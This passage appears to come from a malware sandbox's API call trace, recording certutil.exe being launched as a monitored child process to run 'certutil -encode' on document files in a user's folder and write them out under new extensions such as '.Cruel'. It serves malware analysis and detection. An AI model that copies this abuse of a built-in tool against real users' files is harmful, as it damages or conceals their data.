_wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0307.321] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef159eaf8 | out: phkResult=0x1ef159eaf8*=0x23c) returned 0x0 [0307.321] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1378df949a0 [0307.321] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x1ef159f068, lpData=0x1ef159f098, lpcbData=0x1ef159f060*=0x4 | out: lpType=0x1ef159f068*=0x0, lpData=0x1ef159f098*=0x0, lpcbData=0x1ef159f060*=0x4) returned 0x2 [0307.321] LocalFree (hMem=0x1378df949a0) returned 0x0 [0307.321] RegCloseKey (hKey=0x23c) returned 0x0 [0307.321] LocalFree (hMem=0x0) returned 0x0 [0307.321] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1378dfacef0 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0307.336] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0307.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0307.337] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0307.337] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0307.337] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0307.337] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0307.337] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0307.337] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0307.337] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1378dfb1ed0 [0307.337] GetComputerNameW (in: lpBuffer=0x1378dfb1ed0, nSize=0x1ef159f060 | out: lpBuffer="NQDPDE", nSize=0x1ef159f060) returned 1 [0307.337] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x1ef159f030 | out: lpBuffer=0x0, nSize=0x1ef159f030) returned 0 [0307.338] GetLastError () returned 0xea [0307.338] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1378df9b670 [0307.338] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1378df9b670, nSize=0x1ef159f030 | out: lpBuffer="NQdPdE", nSize=0x1ef159f030) returned 1 [0307.338] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0307.342] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1378dfb2030, cbCertEncoded=0xd540) returned 0x0 [0307.346] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1378dfb2030, cbCrlEncoded=0xd540) returned 0x0 [0307.347] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1378dfb2030, cbEncoded=0xd540, dwFlags=0x8000, pDecodePara=0x1ef159ef10, pvStructInfo=0x1ef159efa0, pcbStructInfo=0x1ef159ef94 | out: pvStructInfo=0x1ef159efa0, pcbStructInfo=0x1ef159ef94) returned 0 [0307.348] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1378dfb2030, cbEncoded=0xd540, dwFlags=0x8000, pDecodePara=0x1ef159ef10, pvStructInfo=0x1ef159efa0, pcbStructInfo=0x1ef159ef94 | out: pvStructInfo=0x1ef159efa0, pcbStructInfo=0x1ef159ef94) returned 0 [0307.348] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1378dfb2030, cbEncoded=0xd540, dwFlags=0x8000, pDecodePara=0x1ef159ef10, pvStructInfo=0x1ef159efa0, pcbStructInfo=0x1ef159ef94 | out: pvStructInfo=0x1ef159efa0, pcbStructInfo=0x1ef159ef94) returned 0 [0307.348] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1378df95440 [0307.359] CryptMsgUpdate (hCryptMsg=0x1378df95440, pbData=0x1378dfb2030, cbData=0xd540, fFinal=1) returned 0 [0307.359] GetLastError () returned 0x8009310b [0307.359] CryptMsgClose (hCryptMsg=0x1378df95440) returned 1 [0307.359] GetFileAttributesExW (in: lpFileName="0H3WME_tqNVE6XV UFW.docx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx.sister"), fInfoLevelId=0x0, lpFileInformation=0x1ef159efc0 | out: lpFileInformation=0x1ef159efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c20e9d0, ftCreationTime.dwHighDateTime=0x1d5dd58, ftLastAccessTime.dwLowDateTime=0x51e00a80, ftLastAccessTime.dwHighDateTime=0x1d5859b, ftLastWriteTime.dwLowDateTime=0x51e00a80, ftLastWriteTime.dwHighDateTime=0x1d5859b, nFileSizeHigh=0x0, nFileSizeLow=0xd540)) returned 1 [0307.359] _vsnwprintf (in: _Buffer=0x1ef159efc8, _BufferCount=0xb, _Format="%d", _ArgList=0x1ef159efb8 | out: _Buffer="359") returned 3 [0307.359] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x1ef159ed80, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0307.359] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1378dfb1b70 [0307.359] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.359] _vsnwprintf (in: _Buffer=0x1ef159dfb0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x1ef159f008 | out: _Buffer="Input Length = 54592") returned 20 [0307.359] GetFileType (hFile=0x50) returned 0x2 [0307.359] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1ef159dfb0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1ef159df64, lpReserved=0x0 | out: lpBuffer=0x1ef159dfb0*, lpNumberOfCharsWritten=0x1ef159df64*=0x14) returned 1 [0307.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.361] _vsnwprintf (in: _Buffer=0x1ef159dfb0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x1ef159f008 | out: _Buffer="\n") returned 1 [0307.361] GetFileType (hFile=0x50) returned 0x2 [0307.361] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1ef159dfb0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1ef159df64, lpReserved=0x0 | out: lpBuffer=0x1ef159dfb0*, lpNumberOfCharsWritten=0x1ef159df64*=0x1) returned 1 [0307.381] GetFileAttributesExW (in: lpFileName="0H3WME_tqNVE6XV UFW.docx.Cruel" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx.cruel"), fInfoLevelId=0x0, lpFileInformation=0x1ef159efc0 | out: lpFileInformation=0x1ef159efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1d0a343, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xe1d0a343, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe1d27811, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x12574)) returned 1 [0307.381] _vsnwprintf (in: _Buffer=0x1ef159efc8, _BufferCount=0xb, _Format="%d", _ArgList=0x1ef159efb8 | out: _Buffer="361") returned 3 [0307.381] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x1ef159ed80, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0307.381] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1378dfb1a50 [0307.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.382] _vsnwprintf (in: _Buffer=0x1ef159dfb0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x1ef159f008 | out: _Buffer="Output Length = 75124") returned 21 [0307.382] GetFileType (hFile=0x50) returned 0x2 [0307.382] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1ef159dfb0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x1ef159df64, lpReserved=0x0 | out: lpBuffer=0x1ef159dfb0*, lpNumberOfCharsWritten=0x1ef159df64*=0x15) returned 1 [0307.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.383] _vsnwprintf (in: _Buffer=0x1ef159dfb0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x1ef159f008 | out: _Buffer="\n") returned 1 [0307.383] GetFileType (hFile=0x50) returned 0x2 [0307.383] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1ef159dfb0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1ef159df64, lpReserved=0x0 | out: lpBuffer=0x1ef159dfb0*, lpNumberOfCharsWritten=0x1ef159df64*=0x1) returned 1 [0307.388] LocalFree (hMem=0x1378dfb2030) returned 0x0 [0307.390] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0307.390] _vsnwprintf (in: _Buffer=0x1ef159f028, _BufferCount=0xb, _Format="%d", _ArgList=0x1ef159f018 | out: _Buffer="2022") returned 4 [0307.390] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x1ef159ede0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0307.390] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1378df88a60 [0307.390] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.390] _vsnwprintf (in: _Buffer=0x1ef159e010, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x1ef159f068 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0307.390] GetFileType (hFile=0x50) returned 0x2 [0307.390] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1ef159e010*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x1ef159dfc4, lpReserved=0x0 | out: lpBuffer=0x1ef159e010*, lpNumberOfCharsWritten=0x1ef159dfc4*=0x31) returned 1 [0307.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.391] _vsnwprintf (in: _Buffer=0x1ef159e010, _BufferCount=0x1ff, _Format="\n", _ArgList=0x1ef159f068 | out: _Buffer="\n") returned 1 [0307.391] GetFileType (hFile=0x50) returned 0x2 [0307.391] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1ef159e010*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1ef159dfc4, lpReserved=0x0 | out: lpBuffer=0x1ef159e010*, lpNumberOfCharsWritten=0x1ef159dfc4*=0x1) returned 1 [0307.397] LocalFree (hMem=0x0) returned 0x0 [0307.398] LocalFree (hMem=0x1378df8cf70) returned 0x0 [0307.398] LocalFree (hMem=0x1378df90b80) returned 0x0 [0307.398] SetLastError (dwErrCode=0x80070716) [0307.398] _vsnwprintf (in: _Buffer=0x1ef159f098, _BufferCount=0xb, _Format="%d", _ArgList=0x1ef159f088 | out: _Buffer="511") returned 3 [0307.398] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x1ef159ee50, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0307.398] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1378dfb19c0 [0307.398] PostQuitMessage (nExitCode=0) [0307.398] GetMessageW (in: lpMsg=0x1ef159f690, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1ef159f690) returned 0 [0307.398] LocalFree (hMem=0x1378df9b670) returned 0x0 [0307.398] LocalFree (hMem=0x1378dfb1ed0) returned 0x0 [0307.398] LocalFree (hMem=0x0) returned 0x0 [0307.399] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0307.400] GetLastError () returned 0x7e [0307.400] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0307.400] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0307.400] DllMain () returned 0x1 [0307.400] LocalFree (hMem=0x1378df9b690) returned 0x0 [0307.400] LocalFree (hMem=0x1378df942e0) returned 0x0 [0307.400] LocalFree (hMem=0x1378dfb1b70) returned 0x0 [0307.400] LocalFree (hMem=0x1378dfb1a50) returned 0x0 [0307.400] LocalFree (hMem=0x1378df88a60) returned 0x0 [0307.400] LocalFree (hMem=0x1378dfb19c0) returned 0x0 [0307.400] LocalFree (hMem=0x1378df94350) returned 0x0 [0307.400] LocalFree (hMem=0x1378df93bc0) returned 0x0 [0307.400] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0307.401] GetLastError () returned 0x7e [0307.401] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0307.401] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0307.401] DllMain () returned 0x1 [0307.401] exit (_Code=0) Thread: id = 140 os_tid = 0x1044 Process: id = "57" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1da20000" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 141 os_tid = 0x524 [0307.720] GetStartupInfoW (in: lpStartupInfo=0xbeb637f7c0 | out: lpStartupInfo=0xbeb637f7c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0307.722] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0307.723] __set_app_type (_Type=0x1) [0307.723] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0307.723] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0307.726] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0307.726] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0307.727] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0307.727] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0307.727] WerSetFlags () returned 0x0 [0307.727] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0307.728] __iob_func () returned 0x7ffcea2dea00 [0307.728] _fileno (_File=0x7ffcea2dea30) returned 1 [0307.728] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0307.728] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0307.729] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0307.729] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0307.729] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0307.730] GetConsoleOutputCP () returned 0x1b5 [0307.730] _vsnwprintf (in: _Buffer=0xbeb637f730, _BufferCount=0xb, _Format=".%d", _ArgList=0xbeb637f658 | out: _Buffer=".437") returned 4 [0307.730] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0307.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.730] GetFileType (hFile=0x50) returned 0x2 [0307.731] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0307.731] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0307.731] SetThreadUILanguage (LangId=0x0) returned 0x409 [0307.731] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0307.732] GetCommandLineW () returned="certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"" [0307.732] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x27a682eb350 [0307.732] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x27a682dcce0 [0307.732] LocalFree (hMem=0x27a682eb350) returned 0x0 [0307.732] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x27a682dbd90 [0307.732] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x27a682dc0c0 [0307.732] LocalFree (hMem=0x27a682dbd90) returned 0x0 [0307.732] LocalFree (hMem=0x27a682dcce0) returned 0x0 [0307.732] LocalFree (hMem=0x0) returned 0x0 [0307.732] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0307.732] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0307.733] GetCommandLineW () returned="certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"" [0307.733] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x27a682eb750 [0307.733] GetSystemTime (in: lpSystemTime=0xbeb637f420 | out: lpSystemTime=0xbeb637f420*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x16, wMilliseconds=0x111)) [0307.733] SystemTimeToFileTime (in: lpSystemTime=0xbeb637f420, lpFileTime=0xbeb637f418 | out: lpFileTime=0xbeb637f418) returned 1 [0307.733] FileTimeToLocalFileTime (in: lpFileTime=0xbeb637f418, lpLocalFileTime=0xbeb637f3e0 | out: lpLocalFileTime=0xbeb637f3e0) returned 1 [0307.733] FileTimeToSystemTime (in: lpFileTime=0xbeb637f3e0, lpSystemTime=0xbeb637f150 | out: lpSystemTime=0xbeb637f150) returned 1 [0307.733] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xbeb637f150, lpFormat=0x0, lpDateStr=0xbeb637f260, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0307.733] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xbeb637f150, lpFormat=0x0, lpTimeStr=0xbeb637f160, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0307.733] _vsnwprintf (in: _Buffer=0xbeb637f16e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xbeb637f138 | out: _Buffer=" 22.273s") returned 8 [0307.733] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x27a682ee170 [0307.734] SetLastError (dwErrCode=0x80070716) [0307.734] _vsnwprintf (in: _Buffer=0xbeb637f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0xbeb637f1d8 | out: _Buffer="948") returned 3 [0307.734] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xbeb637efa0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0307.734] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x27a682eb610 [0307.734] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x27a682e46e0 [0307.734] LocalFree (hMem=0x27a682ee170) returned 0x0 [0307.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbeb637f490 | out: lpSystemTimeAsFileTime=0xbeb637f490*(dwLowDateTime=0xe208551f, dwHighDateTime=0x1d6141f)) [0307.734] GetLocalTime (in: lpSystemTime=0xbeb637f4c8 | out: lpSystemTime=0xbeb637f4c8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x16, wMilliseconds=0x112)) [0307.734] SystemTimeToFileTime (in: lpSystemTime=0xbeb637f4c8, lpFileTime=0xbeb637f4a0 | out: lpFileTime=0xbeb637f4a0) returned 1 [0307.734] CompareFileTime (lpFileTime1=0xbeb637f4a0, lpFileTime2=0xbeb637f490) returned 1 [0307.735] _vsnwprintf (in: _Buffer=0xbeb637f4d8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xbeb637f468 | out: _Buffer="GMT + 2.00") returned 10 [0307.735] LocalFree (hMem=0x27a682eb750) returned 0x0 [0307.735] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0307.735] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0307.735] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0307.735] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0307.735] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0307.735] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xbeb637f508 | out: _Buffer="10.0.15063.447") returned 14 [0307.735] GetACP () returned 0x4e4 [0307.735] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0307.735] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x27a682eb390 [0307.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x27a682eb390, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0307.736] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x27a682ee070 [0307.736] _vsnwprintf (in: _Buffer=0x27a682ee070, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xbeb637f558 | out: _Buffer="10.0.15063.447 retail") returned 21 [0307.736] LocalFree (hMem=0x27a682eb390) returned 0x0 [0307.736] LocalFree (hMem=0x0) returned 0x0 [0307.736] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0307.736] GetACP () returned 0x4e4 [0307.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0307.736] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x27a682eb750 [0307.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x27a682eb750, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0307.736] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x27a682ee170 [0307.736] _vsnwprintf (in: _Buffer=0x27a682ee170, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xbeb637f558 | out: _Buffer="10.0.15063.447 retail273s") returned 21 [0307.736] LocalFree (hMem=0x27a682eb750) returned 0x0 [0307.736] LocalFree (hMem=0x0) returned 0x0 [0307.736] GetACP () returned 0x4e4 [0307.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0307.736] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x27a682eb990 [0307.737] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x27a682eb990, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0307.737] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x27a682ee0b0 [0307.737] _vsnwprintf (in: _Buffer=0x27a682ee0b0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xbeb637f588 | out: _Buffer="10.0.15063.447 retail") returned 21 [0307.737] LocalFree (hMem=0x27a682eb990) returned 0x0 [0307.737] LocalFree (hMem=0x27a682ee070) returned 0x0 [0307.737] LocalFree (hMem=0x27a682ee170) returned 0x0 [0307.737] LocalFree (hMem=0x27a682ee0b0) returned 0x0 [0307.737] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0307.737] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0307.737] GetStockObject (i=0) returned 0x900010 [0307.737] RegisterClassW (lpWndClass=0xbeb637f6b0) returned 0xc1a2 [0307.738] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2d02c8 [0307.773] NtdllDefWindowProc_W () returned 0x0 [0307.774] NtdllDefWindowProc_W () returned 0x1 [0307.782] NtdllDefWindowProc_W () returned 0x0 [0307.793] UpdateWindow (hWnd=0x2d02c8) returned 1 [0307.793] PostMessageW (hWnd=0x2d02c8, Msg=0x400, wParam=0x0, lParam=0x27a682d217e) returned 1 [0307.793] GetMessageW (in: lpMsg=0xbeb637f700, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xbeb637f700) returned 1 [0307.794] TranslateMessage (lpMsg=0xbeb637f700) returned 0 [0307.794] DispatchMessageW (lpMsg=0xbeb637f700) returned 0x0 [0307.794] NtdllDefWindowProc_W () returned 0x0 [0307.794] GetMessageW (in: lpMsg=0xbeb637f700, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xbeb637f700) returned 1 [0307.794] TranslateMessage (lpMsg=0xbeb637f700) returned 0 [0307.794] DispatchMessageW (lpMsg=0xbeb637f700) returned 0x0 [0307.794] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x27a682d4430 [0307.794] LocalAlloc (uFlags=0x0, uBytes=0x9a) returned 0x27a682d95b0 [0307.794] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0307.794] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, 